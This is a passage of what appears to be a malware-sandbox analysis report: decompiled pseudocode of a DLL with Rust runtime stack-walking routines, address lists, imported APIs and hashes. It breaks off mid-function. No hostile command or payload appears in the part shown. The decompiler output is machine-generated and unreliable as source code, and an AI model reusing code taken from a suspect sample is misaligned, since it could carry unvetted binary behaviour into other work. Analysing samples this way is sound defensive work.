                                                                                                                                                                                      										 *((intOrPtr*)(_t310 + 0x98)) =  *((intOrPtr*)(_t310 + 0x244));
                                                                                                                                                                                      										 *(_t310 + 0x9c) = 0;
                                                                                                                                                                                      										 *(_t310 + 0xa4) = 3;
                                                                                                                                                                                      										while(1) {
                                                                                                                                                                                      											_t227 =  *(_t310 + 0x28)(0x14c,  *(_t310 + 0x10),  *(_t310 + 0x24), _t310 + 0x78, _t310 + 0x190, 0, _t308, _t267, 0, 0);
                                                                                                                                                                                      											__eflags = _t227 - 1;
                                                                                                                                                                                      											if(_t227 != 1) {
                                                                                                                                                                                      												goto L47;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											 *(_t310 + 0x188) =  *_t267( *(_t310 + 0x20),  *(_t310 + 0x78), 0);
                                                                                                                                                                                      											 *(_t310 + 0x5a8) = 3;
                                                                                                                                                                                      											_t235 = E6E9DE6E0(_t267, _t310 + 0x2c, _t310 + 0x70, _t308, _t310);
                                                                                                                                                                                      											_t308 =  *(_t310 + 0x1c);
                                                                                                                                                                                      											_t267 =  *(_t310 + 0x14);
                                                                                                                                                                                      											__eflags = _t235;
                                                                                                                                                                                      											if(_t235 != 0) {
                                                                                                                                                                                      												continue;
                                                                                                                                                                                      											}
                                                                                                                                                                                      											goto L47;
                                                                                                                                                                                      										}
                                                                                                                                                                                      										goto L47;
                                                                                                                                                                                      									} else {
                                                                                                                                                                                      										_t221 = GetProcAddress( *0x6ea2e130, "StackWalkEx");
                                                                                                                                                                                      										__eflags = _t221;
                                                                                                                                                                                      										if(_t221 == 0) {
                                                                                                                                                                                      											E6E9EE9D0(_t308, _t310 + 0x80, 0, 0x100);
                                                                                                                                                                                      											_t324 = _t324 + 0xc;
                                                                                                                                                                                      											 *(_t310 + 0x74) = 0;
                                                                                                                                                                                      											 *(_t310 + 0x70) = 1;
                                                                                                                                                                                      											 *(_t310 + 0x188) = 0;
                                                                                                                                                                                      											 *(_t310 + 0x7c) = 0;
                                                                                                                                                                                      											 *(_t310 + 0x78) =  *(_t310 + 0x248);
                                                                                                                                                                                      											 *(_t310 + 0x84) = 3;
                                                                                                                                                                                      											 *((intOrPtr*)(_t310 + 0xa8)) =  *((intOrPtr*)(_t310 + 0x254));
                                                                                                                                                                                      											 *(_t310 + 0xac) = 0;
                                                                                                                                                                                      											 *(_t310 + 0xb4) = 3;
                                                                                                                                                                                      											 *((intOrPtr*)(_t310 + 0x98)) =  *((intOrPtr*)(_t310 + 0x244));
                                                                                                                                                                                      											 *(_t310 + 0x9c) = 0;
                                                                                                                                                                                      											 *(_t310 + 0xa4) = 3;
                                                                                                                                                                                      											do {
                                                                                                                                                                                      												_t284 =  *0x6ea2e144; // 0x0
                                                                                                                                                                                      												__eflags = _t284;
                                                                                                                                                                                      												if(_t284 != 0) {
                                                                                                                                                                                      													L63:
                                                                                                                                                                                      													_t241 =  *_t284(0x14c,  *(_t310 + 0x10),  *(_t310 + 0x24), _t310 + 0x78, _t310 + 0x190, 0, _t308, _t267, 0);
                                                                                                                                                                                      													__eflags = _t241 - 1;
                                                                                                                                                                                      													if(_t241 != 1) {
                                                                                                                                                                                      														L47:
                                                                                                                                                                                      														ReleaseMutex( *(_t310 + 0x58));
                                                                                                                                                                                      														__eflags =  *((char*)(_t310 + 0xf));
                                                                                                                                                                                      														if( *((char*)(_t310 + 0xf)) != 0) {
                                                                                                                                                                                      															goto L50;
                                                                                                                                                                                      														} else {
                                                                                                                                                                                      															goto L48;
                                                                                                                                                                                      														}
                                                                                                                                                                                      														goto L54;
                                                                                                                                                                                      													} else {
                                                                                                                                                                                      														goto L64;
                                                                                                                                                                                      													}
                                                                                                                                                                                      												} else {
                                                                                                                                                                                      													_t244 = GetProcAddress( *0x6ea2e130, "StackWalk64");
                                                                                                                                                                                      													__eflags = _t244;
                                                                                                                                                                                      													if(__eflags == 0) {
                                                                                                                                                                                      														 *(_t310 + 0x5a8) = 3;
                                                                                                                                                                                      														E6E9F94E0(_t267, "called `Option::unwrap()` on a `None` value", 0x2b, _t308, _t310, __eflags, 0x6ea20ad0);
                                                                                                                                                                                      														goto L70;
                                                                                                                                                                                      													} else {
                                                                                                                                                                                      														_t284 = _t244;
                                                                                                                                                                                      														 *0x6ea2e144 = _t244;
                                                                                                                                                                                      														goto L63;
                                                                                                                                                                                      													}
                                                                                                                                                                                      												}
                                                                                                                                                                                      												goto L71;
                                                                                                                                                                                      												L64:
                                                                                                                                                                                      												 *(_t310 + 0x188) =  *_t267( *(_t310 + 0x20),  *(_t310 + 0x78), 0);
                                                                                                                                                                                      												 *(_t310 + 0x5a8) = 3;
                                                                                                                                                                                      												_t243 = E6E9DE6E0(_t267, _t310 + 0x2c, _t310 + 0x70, _t308, _t310);
                                                                                                                                                                                      												_t308 =  *(_t310 + 0x1c);
                                                                                                                                                                                      												_t267 =  *(_t310 + 0x14);
                                                                                                                                                                                      												__eflags = _t243;
                                                                                                                                                                                      											} while (_t243 != 0);
                                                                                                                                                                                      											goto L47;
                                                                                                                                                                                      										} else {
                                                                                                                                                                                      											 *0x6ea2e158 = _t221;
                                                                                                                                                                                      											goto L44;
                                                                                                                                                                                      										}
                                                                                                                                                                                      									}
                                                                                                                                                                                      								} else {
                                                                                                                                                                                      									L39:
                                                                                                                                                                                      									_t246 = GetProcAddress( *0x6ea2e130, "SymGetModuleBase64");
                                                                                                                                                                                      									__eflags = _t246;
                                                                                                                                                                                      									if(__eflags == 0) {
                                                                                                                                                                                      										 *(_t310 + 0x5a8) = 3;
                                                                                                                                                                                      										E6E9F94E0(_t267, "called `Option::unwrap()` on a `None` value", 0x2b, _t308, _t310, __eflags, 0x6ea20ad0);
                                                                                                                                                                                      										L70:
                                                                                                                                                                                      										asm("ud2");
                                                                                                                                                                                      										_push(_t313);
                                                                                                                                                                                      										return E6E9DE6D0( *((intOrPtr*)( &_v1456 + 0x58)));
                                                                                                                                                                                      									} else {
                                                                                                                                                                                      										_t267 = _t246;
                                                                                                                                                                                      										 *0x6ea2e14c = _t246;
                                                                                                                                                                                      										goto L41;
                                                                                                                                                                                      									}
                                                                                                                                                                                      								}
                                                                                                                                                                                      							}
                                                                                                                                                                                      						} else {
                                                                                                                                                                                      							__eflags =  *((char*)(_t310 + 0xf));
                                                                                                                                                                                      							if( *((char*)(_t310 + 0xf)) != 0) {
                                                                                                                                                                                      								goto L50;
                                                                                                                                                                                      							} else {
                                                                                                                                                                                      								L48:
                                                                                                                                                                                      								__eflags =  *(_t310 + 0xe);
                                                                                                                                                                                      								if( *(_t310 + 0xe) != 0) {
                                                                                                                                                                                      									L55:
                                                                                                                                                                                      									_t229 =  *(_t310 + 0x5c);
                                                                                                                                                                                      									__eflags = _t229;
                                                                                                                                                                                      									if(_t229 != 0) {
                                                                                                                                                                                      										__eflags =  *(_t310 + 0x60);
                                                                                                                                                                                      										if( *(_t310 + 0x60) != 0) {
                                                                                                                                                                                      											HeapFree( *0x6ea2e128, 0, _t229);
                                                                                                                                                                                      										}
                                                                                                                                                                                      									}
                                                                                                                                                                                      									_t206 = 0;
                                                                                                                                                                                      								} else {
                                                                                                                                                                                      									 *(_t310 + 0x190) = 0x6ea1fe4c;
                                                                                                                                                                                      									 *(_t310 + 0x194) = 1;
                                                                                                                                                                                      									 *(_t310 + 0x198) = 0;
                                                                                                                                                                                      									 *((intOrPtr*)(_t310 + 0x1a0)) = 0x6ea1f570;
                                                                                                                                                                                      									 *(_t310 + 0x1a4) = 0;
                                                                                                                                                                                      									 *(_t310 + 0x5a8) = 2;
                                                                                                                                                                                      									_push(_t310 + 0x190);
                                                                                                                                                                                      									_t233 = E6E9D2150( *((intOrPtr*)(_a8 + 0x18)),  *(_a8 + 0x1c));
                                                                                                                                                                                      									__eflags = _t233;
                                                                                                                                                                                      									if(_t233 == 0) {
                                                                                                                                                                                      										goto L55;
                                                                                                                                                                                      									} else {
                                                                                                                                                                                      										goto L50;
                                                                                                                                                                                      									}
                                                                                                                                                                                      								}
                                                                                                                                                                                      							}
                                                                                                                                                                                      							L54:
                                                                                                                                                                                      							 *[fs:0x0] =  *((intOrPtr*)(_t310 + 0x5a0));
                                                                                                                                                                                      							return _t206;
                                                                                                                                                                                      						}
                                                                                                                                                                                      					}
                                                                                                                                                                                      				}
                                                                                                                                                                                      				L71:
                                                                                                                                                                                      			}



















































                                                                                                                                                                                      0x6e9ddd33
                                                                                                                                                                                      0x6e9ddd34
                                                                                                                                                                                      0x6e9ddd35
                                                                                                                                                                                      0x6e9ddd39
                                                                                                                                                                                      0x6e9ddd3f
                                                                                                                                                                                      0x6e9ddd41
                                                                                                                                                                                      0x6e9ddd47
                                                                                                                                                                                      0x6e9ddd4d
                                                                                                                                                                                      0x6e9ddd57
                                                                                                                                                                                      0x6e9ddd71
                                                                                                                                                                                      0x6e9ddd77
                                                                                                                                                                                      0x6e9ddd7e
                                                                                                                                                                                      0x6e9ddd80
                                                                                                                                                                                      0x6e9ddd83
                                                                                                                                                                                      0x6e9ddd94
                                                                                                                                                                                      0x6e9ddd99
                                                                                                                                                                                      0x6e9ddd9c
                                                                                                                                                                                      0x6e9ddda1
                                                                                                                                                                                      0x6e9ddda6
                                                                                                                                                                                      0x6e9dddad
                                                                                                                                                                                      0x6e9dddb0
                                                                                                                                                                                      0x6e9dddb7
                                                                                                                                                                                      0x6e9dddba
                                                                                                                                                                                      0x6e9dddc7
                                                                                                                                                                                      0x6e9dddca
                                                                                                                                                                                      0x6e9ddde6
                                                                                                                                                                                      0x6e9ddde6
                                                                                                                                                                                      0x6e9dddec
                                                                                                                                                                                      0x6e9dddf0
                                                                                                                                                                                      0x6e9dddf2
                                                                                                                                                                                      0x6e9dddf4
                                                                                                                                                                                      0x6e9dddfe
                                                                                                                                                                                      0x6e9dde02
                                                                                                                                                                                      0x6e9dde07
                                                                                                                                                                                      0x6e9dde0d
                                                                                                                                                                                      0x6e9dde0d
                                                                                                                                                                                      0x6e9dde10
                                                                                                                                                                                      0x6e9dde13
                                                                                                                                                                                      0x6e9dde16
                                                                                                                                                                                      0x6e9dde19
                                                                                                                                                                                      0x6e9dde1c
                                                                                                                                                                                      0x6e9dde1f
                                                                                                                                                                                      0x6e9dddcc
                                                                                                                                                                                      0x6e9dde30
                                                                                                                                                                                      0x6e9dde30
                                                                                                                                                                                      0x6e9dde36
                                                                                                                                                                                      0x6e9dde3d
                                                                                                                                                                                      0x6e9dde3d
                                                                                                                                                                                      0x6e9dde40
                                                                                                                                                                                      0x6e9dde42
                                                                                                                                                                                      0x6e9dde4a
                                                                                                                                                                                      0x6e9dde50
                                                                                                                                                                                      0x6e9dde54
                                                                                                                                                                                      0x6e9dde62
                                                                                                                                                                                      0x6e9dddd0
                                                                                                                                                                                      0x6e9dddd3
                                                                                                                                                                                      0x6e9dddd5
                                                                                                                                                                                      0x6e9dde8d
                                                                                                                                                                                      0x6e9dde90
                                                                                                                                                                                      0x6e9dde9a
                                                                                                                                                                                      0x6e9dde9c
                                                                                                                                                                                      0x6e9de3b8
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9ddea2
                                                                                                                                                                                      0x6e9ddea2
                                                                                                                                                                                      0x6e9ddea5
                                                                                                                                                                                      0x6e9ddea8
                                                                                                                                                                                      0x6e9ddea9
                                                                                                                                                                                      0x6e9ddeae
                                                                                                                                                                                      0x6e9ddeb4
                                                                                                                                                                                      0x6e9ddeb9
                                                                                                                                                                                      0x6e9ddebb
                                                                                                                                                                                      0x6e9ddebe
                                                                                                                                                                                      0x6e9ddec3
                                                                                                                                                                                      0x6e9ddec6
                                                                                                                                                                                      0x6e9ddec8
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9ddeca
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9ddec8
                                                                                                                                                                                      0x6e9ddddb
                                                                                                                                                                                      0x6e9ddddb
                                                                                                                                                                                      0x6e9ddde1
                                                                                                                                                                                      0x6e9ddde4
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9ddde4
                                                                                                                                                                                      0x6e9dde77
                                                                                                                                                                                      0x6e9dde7a
                                                                                                                                                                                      0x6e9dde82
                                                                                                                                                                                      0x6e9dde85
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dde8b
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dde8b
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9dde85
                                                                                                                                                                                      0x6e9ddecc
                                                                                                                                                                                      0x6e9ddecc
                                                                                                                                                                                      0x6e9dded2
                                                                                                                                                                                      0x6e9dded4
                                                                                                                                                                                      0x6e9dded7
                                                                                                                                                                                      0x6e9ddede
                                                                                                                                                                                      0x6e9ddee1
                                                                                                                                                                                      0x6e9ddee3
                                                                                                                                                                                      0x6e9ddee5
                                                                                                                                                                                      0x6e9ddee5
                                                                                                                                                                                      0x6e9ddee9
                                                                                                                                                                                      0x6e9ddeeb
                                                                                                                                                                                      0x6e9ddef0
                                                                                                                                                                                      0x6e9ddefd
                                                                                                                                                                                      0x6e9ddefd
                                                                                                                                                                                      0x6e9ddef0
                                                                                                                                                                                      0x6e9ddee9
                                                                                                                                                                                      0x6e9ddf02
                                                                                                                                                                                      0x6e9ddf02
                                                                                                                                                                                      0x6e9ddf04
                                                                                                                                                                                      0x6e9ddf6e
                                                                                                                                                                                      0x6e9ddf71
                                                                                                                                                                                      0x6e9ddf74
                                                                                                                                                                                      0x6e9ddf77
                                                                                                                                                                                      0x6e9ddf7a
                                                                                                                                                                                      0x6e9ddf06
                                                                                                                                                                                      0x6e9ddf06
                                                                                                                                                                                      0x6e9ddf0a
                                                                                                                                                                                      0x6e9ddf0c
                                                                                                                                                                                      0x6e9ddf11
                                                                                                                                                                                      0x6e9ddf17
                                                                                                                                                                                      0x6e9ddf22
                                                                                                                                                                                      0x6e9ddf24
                                                                                                                                                                                      0x6e9ddf27
                                                                                                                                                                                      0x6e9ddf2a
                                                                                                                                                                                      0x6e9ddf2d
                                                                                                                                                                                      0x6e9ddf31
                                                                                                                                                                                      0x6e9ddf33
                                                                                                                                                                                      0x6e9ddf35
                                                                                                                                                                                      0x6e9ddf39
                                                                                                                                                                                      0x6e9ddf3b
                                                                                                                                                                                      0x6e9ddf3b
                                                                                                                                                                                      0x6e9ddf47
                                                                                                                                                                                      0x6e9ddf4c
                                                                                                                                                                                      0x6e9ddf4c
                                                                                                                                                                                      0x6e9ddf58
                                                                                                                                                                                      0x6e9ddf58
                                                                                                                                                                                      0x6e9ddf5d
                                                                                                                                                                                      0x6e9ddf60
                                                                                                                                                                                      0x6e9ddf62
                                                                                                                                                                                      0x6e9ddf62
                                                                                                                                                                                      0x6e9ddf84
                                                                                                                                                                                      0x6e9ddf87
                                                                                                                                                                                      0x6e9ddf8d
                                                                                                                                                                                      0x6e9ddf90
                                                                                                                                                                                      0x6e9ddf93
                                                                                                                                                                                      0x6e9ddf9d
                                                                                                                                                                                      0x6e9ddfa7
                                                                                                                                                                                      0x6e9ddfb1
                                                                                                                                                                                      0x6e9ddfbb
                                                                                                                                                                                      0x6e9ddfc8
                                                                                                                                                                                      0x6e9ddfd1
                                                                                                                                                                                      0x6e9ddfd2
                                                                                                                                                                                      0x6e9ddfd7
                                                                                                                                                                                      0x6e9ddfda
                                                                                                                                                                                      0x6e9ddfdc
                                                                                                                                                                                      0x6e9de255
                                                                                                                                                                                      0x6e9de255
                                                                                                                                                                                      0x6e9de258
                                                                                                                                                                                      0x6e9de25a
                                                                                                                                                                                      0x6e9de25c
                                                                                                                                                                                      0x6e9de260
                                                                                                                                                                                      0x6e9de26b
                                                                                                                                                                                      0x6e9de26b
                                                                                                                                                                                      0x6e9de260
                                                                                                                                                                                      0x6e9de270
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9ddfe2
                                                                                                                                                                                      0x6e9ddfe2
                                                                                                                                                                                      0x6e9ddfe8
                                                                                                                                                                                      0x6e9ddfef
                                                                                                                                                                                      0x6e9ddff3
                                                                                                                                                                                      0x6e9ddff6
                                                                                                                                                                                      0x6e9ddffd
                                                                                                                                                                                      0x6e9ddfff
                                                                                                                                                                                      0x6e9de008
                                                                                                                                                                                      0x6e9de00e
                                                                                                                                                                                      0x6e9de011
                                                                                                                                                                                      0x6e9de018
                                                                                                                                                                                      0x6e9de01c
                                                                                                                                                                                      0x6e9de022
                                                                                                                                                                                      0x6e9de028
                                                                                                                                                                                      0x6e9de02e
                                                                                                                                                                                      0x6e9de036
                                                                                                                                                                                      0x6e9de03f
                                                                                                                                                                                      0x6e9de049
                                                                                                                                                                                      0x6e9de050
                                                                                                                                                                                      0x6e9de055
                                                                                                                                                                                      0x6e9de058
                                                                                                                                                                                      0x6e9de059
                                                                                                                                                                                      0x6e9de05e
                                                                                                                                                                                      0x6e9de063
                                                                                                                                                                                      0x6e9de065
                                                                                                                                                                                      0x6e9de076
                                                                                                                                                                                      0x6e9de07c
                                                                                                                                                                                      0x6e9de07f
                                                                                                                                                                                      0x6e9de081
                                                                                                                                                                                      0x6e9de09a
                                                                                                                                                                                      0x6e9de0a0
                                                                                                                                                                                      0x6e9de0a2
                                                                                                                                                                                      0x6e9de3e5
                                                                                                                                                                                      0x6e9de3fe
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9de0a8
                                                                                                                                                                                      0x6e9de0a8
                                                                                                                                                                                      0x6e9de0aa
                                                                                                                                                                                      0x6e9de0af
                                                                                                                                                                                      0x6e9de0b5
                                                                                                                                                                                      0x6e9de0b7
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9de0b7
                                                                                                                                                                                      0x6e9de083
                                                                                                                                                                                      0x6e9de083
                                                                                                                                                                                      0x6e9de089
                                                                                                                                                                                      0x6e9de08b
                                                                                                                                                                                      0x6e9de0d9
                                                                                                                                                                                      0x6e9de0de
                                                                                                                                                                                      0x6e9de0e1
                                                                                                                                                                                      0x6e9de0e6
                                                                                                                                                                                      0x6e9de0e9
                                                                                                                                                                                      0x6e9de0ec
                                                                                                                                                                                      0x6e9de0ee
                                                                                                                                                                                      0x6e9de10e
                                                                                                                                                                                      0x6e9de10e
                                                                                                                                                                                      0x6e9de117
                                                                                                                                                                                      0x6e9de11e
                                                                                                                                                                                      0x6e9de12d
                                                                                                                                                                                      0x6e9de132
                                                                                                                                                                                      0x6e9de147
                                                                                                                                                                                      0x6e9de14e
                                                                                                                                                                                      0x6e9de151
                                                                                                                                                                                      0x6e9de15b
                                                                                                                                                                                      0x6e9de161
                                                                                                                                                                                      0x6e9de16b
                                                                                                                                                                                      0x6e9de175
                                                                                                                                                                                      0x6e9de17b
                                                                                                                                                                                      0x6e9de185
                                                                                                                                                                                      0x6e9de190
                                                                                                                                                                                      0x6e9de1ae
                                                                                                                                                                                      0x6e9de1b1
                                                                                                                                                                                      0x6e9de1b4
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9de1c6
                                                                                                                                                                                      0x6e9de1cc
                                                                                                                                                                                      0x6e9de1d6
                                                                                                                                                                                      0x6e9de1db
                                                                                                                                                                                      0x6e9de1de
                                                                                                                                                                                      0x6e9de1e1
                                                                                                                                                                                      0x6e9de1e3
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9de1e3
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9de0f0
                                                                                                                                                                                      0x6e9de0fb
                                                                                                                                                                                      0x6e9de101
                                                                                                                                                                                      0x6e9de103
                                                                                                                                                                                      0x6e9de2b4
                                                                                                                                                                                      0x6e9de2b9
                                                                                                                                                                                      0x6e9de2ce
                                                                                                                                                                                      0x6e9de2d5
                                                                                                                                                                                      0x6e9de2dc
                                                                                                                                                                                      0x6e9de2e6
                                                                                                                                                                                      0x6e9de2ed
                                                                                                                                                                                      0x6e9de2f0
                                                                                                                                                                                      0x6e9de2fa
                                                                                                                                                                                      0x6e9de300
                                                                                                                                                                                      0x6e9de30a
                                                                                                                                                                                      0x6e9de314
                                                                                                                                                                                      0x6e9de31a
                                                                                                                                                                                      0x6e9de324
                                                                                                                                                                                      0x6e9de330
                                                                                                                                                                                      0x6e9de330
                                                                                                                                                                                      0x6e9de336
                                                                                                                                                                                      0x6e9de338
                                                                                                                                                                                      0x6e9de356
                                                                                                                                                                                      0x6e9de372
                                                                                                                                                                                      0x6e9de374
                                                                                                                                                                                      0x6e9de377
                                                                                                                                                                                      0x6e9de1e5
                                                                                                                                                                                      0x6e9de1e8
                                                                                                                                                                                      0x6e9de1ed
                                                                                                                                                                                      0x6e9de1f1
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9de33a
                                                                                                                                                                                      0x6e9de345
                                                                                                                                                                                      0x6e9de34b
                                                                                                                                                                                      0x6e9de34d
                                                                                                                                                                                      0x6e9de3c2
                                                                                                                                                                                      0x6e9de3db
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9de34f
                                                                                                                                                                                      0x6e9de34f
                                                                                                                                                                                      0x6e9de351
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9de351
                                                                                                                                                                                      0x6e9de34d
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9de37d
                                                                                                                                                                                      0x6e9de38d
                                                                                                                                                                                      0x6e9de393
                                                                                                                                                                                      0x6e9de39d
                                                                                                                                                                                      0x6e9de3a2
                                                                                                                                                                                      0x6e9de3a5
                                                                                                                                                                                      0x6e9de3a8
                                                                                                                                                                                      0x6e9de3a8
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9de109
                                                                                                                                                                                      0x6e9de109
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9de109
                                                                                                                                                                                      0x6e9de103
                                                                                                                                                                                      0x6e9de08d
                                                                                                                                                                                      0x6e9de0b9
                                                                                                                                                                                      0x6e9de0c4
                                                                                                                                                                                      0x6e9de0ca
                                                                                                                                                                                      0x6e9de0cc
                                                                                                                                                                                      0x6e9de408
                                                                                                                                                                                      0x6e9de421
                                                                                                                                                                                      0x6e9de429
                                                                                                                                                                                      0x6e9de429
                                                                                                                                                                                      0x6e9de430
                                                                                                                                                                                      0x6e9de44c
                                                                                                                                                                                      0x6e9de0d2
                                                                                                                                                                                      0x6e9de0d2
                                                                                                                                                                                      0x6e9de0d4
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9de0d4
                                                                                                                                                                                      0x6e9de0cc
                                                                                                                                                                                      0x6e9de08b
                                                                                                                                                                                      0x6e9de067
                                                                                                                                                                                      0x6e9de067
                                                                                                                                                                                      0x6e9de06b
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9de071
                                                                                                                                                                                      0x6e9de1f3
                                                                                                                                                                                      0x6e9de1f3
                                                                                                                                                                                      0x6e9de1f7
                                                                                                                                                                                      0x6e9de287
                                                                                                                                                                                      0x6e9de287
                                                                                                                                                                                      0x6e9de28a
                                                                                                                                                                                      0x6e9de28c
                                                                                                                                                                                      0x6e9de28e
                                                                                                                                                                                      0x6e9de292
                                                                                                                                                                                      0x6e9de29d
                                                                                                                                                                                      0x6e9de29d
                                                                                                                                                                                      0x6e9de292
                                                                                                                                                                                      0x6e9de2a2
                                                                                                                                                                                      0x6e9de1fd
                                                                                                                                                                                      0x6e9de200
                                                                                                                                                                                      0x6e9de20a
                                                                                                                                                                                      0x6e9de214
                                                                                                                                                                                      0x6e9de21e
                                                                                                                                                                                      0x6e9de228
                                                                                                                                                                                      0x6e9de232
                                                                                                                                                                                      0x6e9de248
                                                                                                                                                                                      0x6e9de249
                                                                                                                                                                                      0x6e9de251
                                                                                                                                                                                      0x6e9de253
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x00000000
                                                                                                                                                                                      0x6e9de253
                                                                                                                                                                                      0x6e9de1f7
                                                                                                                                                                                      0x6e9de272
                                                                                                                                                                                      0x6e9de278
                                                                                                                                                                                      0x6e9de286
                                                                                                                                                                                      0x6e9de286
                                                                                                                                                                                      0x6e9de065
                                                                                                                                                                                      0x6e9ddfdc
                                                                                                                                                                                      0x00000000

                                                                                                                                                                                      APIs
                                                                                                                                                                                      • SetLastError.KERNEL32(00000000), ref: 6E9DDE42
                                                                                                                                                                                      • GetCurrentDirectoryW.KERNEL32(?,?), ref: 6E9DDE4A
                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 6E9DDE56
                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 6E9DDE68
                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 6E9DDECC
                                                                                                                                                                                      • HeapFree.KERNEL32(00000000,00000000), ref: 6E9DDEFD
                                                                                                                                                                                      • HeapFree.KERNEL32(00000000,?), ref: 6E9DDF47
                                                                                                                                                                                      • HeapFree.KERNEL32(00000000,?), ref: 6E9DDF58
                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(?), ref: 6E9DE031
                                                                                                                                                                                      • GetCurrentThread.KERNEL32 ref: 6E9DE039
                                                                                                                                                                                      • RtlCaptureContext.KERNEL32(?), ref: 6E9DE059
                                                                                                                                                                                      • GetProcAddress.KERNEL32(SymFunctionTableAccess64,?), ref: 6E9DE09A
                                                                                                                                                                                      • GetProcAddress.KERNEL32(SymGetModuleBase64), ref: 6E9DE0C4
                                                                                                                                                                                      • GetCurrentProcess.KERNEL32 ref: 6E9DE0D9
                                                                                                                                                                                      • GetProcAddress.KERNEL32(StackWalkEx), ref: 6E9DE0FB
                                                                                                                                                                                      • ReleaseMutex.KERNEL32(?), ref: 6E9DE1E8
                                                                                                                                                                                      • HeapFree.KERNEL32(00000000,?), ref: 6E9DE26B
                                                                                                                                                                                      • HeapFree.KERNEL32(00000000,?,?), ref: 6E9DE29D
                                                                                                                                                                                      • GetProcAddress.KERNEL32(StackWalk64), ref: 6E9DE345
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000000.00000002.648653371.000000006E9D1000.00000020.00020000.sdmp, Offset: 6E9D0000, based on PE: true
                                                                                                                                                                                      • Associated: 00000000.00000002.648641743.000000006E9D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648679004.000000006E9FA000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648703501.000000006EA2D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648715048.000000006EA2F000.00000008.00020000.sdmp Download File
                                                                                                                                                                                      • Associated: 00000000.00000002.648726493.000000006EA30000.00000002.00020000.sdmp Download File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_6e9d0000_loaddll32.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: FreeHeap$AddressCurrentErrorLastProc$Process$CaptureContextDirectoryMutexReleaseThread
                                                                                                                                                                                      • String ID: StackWalk64$StackWalkEx$SymFunctionTableAccess64$SymGetModuleBase64$called `Option::unwrap()` on a `None` value
                                                                                                                                                                                      • API String ID: 1381040140-1036201984
                                                                                                                                                                                      • Opcode ID: af14222981e0c47116c8b344feb081df3f796735aa5f17c84b8f318d60bd041c
                                                                                                                                                                                      • Instruction ID: ab3c560228fd52944de1ec3379aeffbc481e51d2bf910355a766b105a1130de8
                                                                                                                                                                                      • Opcode Fuzzy Hash: af14222981e0c47116c8b344feb081df3f796735aa5f17c84b8f318d60bd041c
                                                                                                                                                                                      • Instruction Fuzzy Hash: E11215B0A04F009FE721CFA5C994B93BBE8BF59304F04892DD5AA9A690D771F449CF51
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      C-Code - Quality: 69%
                                                                                                                                                                                      			E6E9DC700(long _a4, signed int _a8) {
                                                                                                                                                                                      				void* _v20;
                                                                                                                                                                                      				intOrPtr _v24;
                                                                                                                                                                                      				char _v28;
                                                                                                                                                                                      				intOrPtr _v32;
                                                                                                                                                                                      				void* _v36;
                                                                                                                                                                                      				void* _v40;
                                                                                                                                                                                      				char _v41;
                                                                                                                                                                                      				long _v48;
                                                                                                                                                                                      				long* _v52;
                                                                                                                                                                                      				intOrPtr _v56;
                                                                                                                                                                                      				long _v60;
                                                                                                                                                                                      				void _v64;
                                                                                                                                                                                      				long* _v68;
                                                                                                                                                                                      				long _v72;
                                                                                                                                                                                      				char _v76;
                                                                                                                                                                                      				long* _v80;
                                                                                                                                                                                      				void* _v84;
                                                                                                                                                                                      				char _v88;
                                                                                                                                                                                      				long _v92;
                                                                                                                                                                                      				char* _v96;
                                                                                                                                                                                      				long _v100;
                                                                                                                                                                                      				void* _v104;
                                                                                                                                                                                      				void** _v108;
                                                                                                                                                                                      				void* _v112;
                                                                                                                                                                                      				long _v116;
                                                                                                                                                                                      				void* _v120;
                                                                                                                                                                                      				long _v124;
                                                                                                                                                                                      				char _v128;
                                                                                                                                                                                      				intOrPtr _v132;
                                                                                                                                                                                      				void _v136;
